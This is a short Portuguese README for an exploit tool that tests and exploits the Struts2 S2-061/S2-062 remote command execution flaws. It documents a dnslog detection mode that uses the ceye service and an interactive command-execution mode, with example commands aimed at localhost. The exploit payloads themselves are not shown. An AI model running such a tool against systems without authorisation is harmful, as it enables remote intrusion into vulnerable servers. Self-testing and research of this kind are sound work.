
S2-061/S2-062 Struts2 Vulnerabilidade de Execução Remota de Comandos POC&EXP
POC & EXP da vulnerabilidade de execução remota de comandos no Struts2 (CVE-2020-17530 & CVE-2021-31805)
-u url alvo
-m [dnslog|exp] // padrão com verificação de caractere na interface de retorno
-n [s2-062] // padrão s2-061
-s [windows] // padrão linux
-p parâmetro da vulnerabilidade
Struts2RCE -u http://127.0.0.1:8080 // padrão detecção s2-061

Por favor, registre-se no ceye e configure o ceye.ini
Struts2RCE -u http://127.0.0.1:8080 -m dnslog -n s2-062 // detecção s2-062 dnslog, a velocidade depende da rede e do servidor ceye, diferentes URLs precisam limpar o registro dnslog, caso contrário pode causar falso positivo.

Em caso de vulnerabilidade, pode-se inserir diretamente o parâmetro da vulnerabilidade para verificação
Struts2RCE -u http://127.0.0.1:8080 -m exp -p id // vulnerabilidade s2-061, parâmetro id para verificação, digite q para sair

Esta ferramenta destina-se apenas a estudo, pesquisa e auto-verificação. Não utilize para fins ilegais, respeite as leis e regulamentos aplicáveis. Qualquer risco decorrente do uso desta ferramenta não é de responsabilidade do autor!